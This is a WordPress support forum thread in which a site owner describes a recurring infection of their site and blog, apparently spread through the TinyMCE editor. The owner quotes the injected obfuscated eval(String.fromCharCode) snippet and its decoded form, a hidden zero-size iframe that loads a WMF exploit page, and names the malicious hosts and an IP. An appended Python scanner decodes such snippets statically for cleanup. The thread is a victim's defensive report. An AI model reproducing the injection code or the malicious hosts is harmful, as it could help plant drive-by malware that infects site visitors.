Forum Replies Created

Viewing 5 replies - 1 through 5 (of 5 total)
  • Thread Starter duvy

    (@duvy)

    I have access to logs in FTP and logs in the user manager, not sure if they are raw or cleaned up for dummies. The exploit attack was Wednesday and Thursday. I was awake for 27 hours trying to find out how they did it. How should I send or show the logs? Would be grateful for any help.
    My site is
    https://www.darkfaeryglitter.org and WordPress is at
    https://blog.darkfaeryglitter.org

    Thread Starter duvy

    (@duvy)

    So how exactly is it getting into my website? I’ve used HijackThis and anti-virus software, three browsers, System Restore, Ad-Aware, Spybot and a few other programs and it isn’t showing on my hard drive or Windows system files anywhere. IE hasn’t been changed on my PC at all. I was in the middle of writing a post when it started. ??

    Thread Starter duvy

    (@duvy)

    It does look like it’s gone down since a few hours ago, but the image with the exploit in it is still there: https://searchingwww.net/reverse_fun
    Try adding .wmf to the end of that URL in place of .html and a graphic tries to download, which is the actual exploit. This is what is popping up in my browser: 82.179.170.11/dia489
    and that site is still there.

    Thread Starter duvy

    (@duvy)

    Yeah, it looks blank if you don’t have a program to alert you that it is there. I get a warning in AntiVir that says the site is trying to install reverse_fun.wmf, which is a known exploit/virus. If you view the source on that page it links to https:// cc.ad-ware .cc/dia489/ lau.jpg which is nothing also. If you have anti-virus software I suggest you update it and run it, just in case, because it installs seamlessly and you won’t notice until it’s messing things up. I patched Windows when the patch hit Microsoft Update and it still almost infected my PC. Could it have gotten into my database? I haven’t installed a new copy of WordPress because if it’s in the database it will just start again and right now I have it contained. I’m not too good with MySQL so I’m not sure how to check.
    Edit: if you are not sure, please don’t follow that above image.

    Thread Starter duvy

    (@duvy)

    I’ve already cleaned it up twice, deleting the entire site, cleaning every file with multi-replace, checking them to make sure the code is gone from each page, restoring a backup, and it goes away, but then when I use the feature-rich text editor, it starts again.
    This is the code that was replicating into every PHP and HTML in my site:

    eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,115,101,97,114,99,104,105,110,103,119,119,119,46,110,101,116,47,114,101,118,101,114,115,101,95,102,117,110,46,104,116,109,108,34,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,98,111,114,100,101,114,61,48,32,102,114,97,109,101,98,111,114,100,101,114,61,48,62,60,47,105,102,114,97,109,101,62,39,41))

    This is the code (translated):

    Code:
    'document.write(\'<iframe src="https://searchingwww.net/reverse_fun.html" height=0 width=0 border=0 frameborder=0></iframe>\')'

    Now that I have removed TinyMCE completely it has stopped, but I’m worried that won’t stop this from happening in the future and maybe it is happening seamlessly to other sites. Like I mentioned, I would not have detected it if I wasn’t using ZoneAlarm/AntiVir; it would have slipped the file into my temporary internet folder without even asking me. Honestly, I have never had trouble with PowWeb until upgrading WordPress a few days ago. I’m not blaming WordPress or anything, just bots and hackers, but I like using TinyMCE and I want to block it, or get that site pulled so they can’t do it anymore. ?? Any suggestions?
    Thanks for all your help!

    Edit: I also tested in 3 browsers and it affected all of them, so it isn’t just IE.
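
Added example, not part of the original posts: a static check for the kind of injected snippet quoted above, which finds `String.fromCharCode(...)` runs in a file's text, decodes them without executing anything, and reports any zero-sized iframe the decoded text writes. The sample input and the host `injected.example` are constructed placeholders, and the function names are this example's own.

```python
import re

# String.fromCharCode(<decimal list>), optionally wrapped in eval( ... ).
CHARCODE_RE = re.compile(
    r"(?:eval\s*\(\s*)?String\.fromCharCode\s*\(\s*([\d\s,]+?)\s*\)", re.I)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def decode_charcodes(arg_list):
    """Statically turn '100,111,...' into text; nothing is ever executed."""
    out = []
    for tok in arg_list.split(","):
        tok = tok.strip()
        if tok:
            n = int(tok)
            # Out-of-range values become U+FFFD instead of raising.
            out.append(chr(n) if n <= 0x10FFFF else "\ufffd")
    return "".join(out)


def hidden_iframes(html):
    """Return the src of every iframe whose height or width is 0."""
    hits = []
    for tag in IFRAME_RE.findall(html):
        attrs = {m[0].lower(): (m[1] or m[2] or m[3]) for m in ATTR_RE.findall(tag)}
        if attrs.get("height") in ("0", "0px") or attrs.get("width") in ("0", "0px"):
            hits.append(attrs.get("src", ""))
    return hits


def scan(text):
    """Report each charcode-encoded snippet: offset, decoded text, hidden iframes."""
    findings = []
    for m in CHARCODE_RE.finditer(text):
        decoded = decode_charcodes(m.group(1))
        findings.append({"offset": m.start(), "decoded": decoded,
                         "hidden_iframe_src": hidden_iframes(decoded)})
    return findings


# Constructed sample: a page footer with an injected snippet (placeholder host).
PAYLOAD = ("document.write('<iframe src=\"http://injected.example/x.html\" "
           "height=0 width=0></iframe>')")
SAMPLE = "<p>footer</p><script>eval(String.fromCharCode(%s))</script>" % ",".join(
    str(ord(c)) for c in PAYLOAD)

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f["offset"], f["hidden_iframe_src"], f["decoded"])
```

Running `scan()` over the contents of each PHP and HTML file in a site backup gives the offset of every encoded snippet, so a cleanup can be verified file by file.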
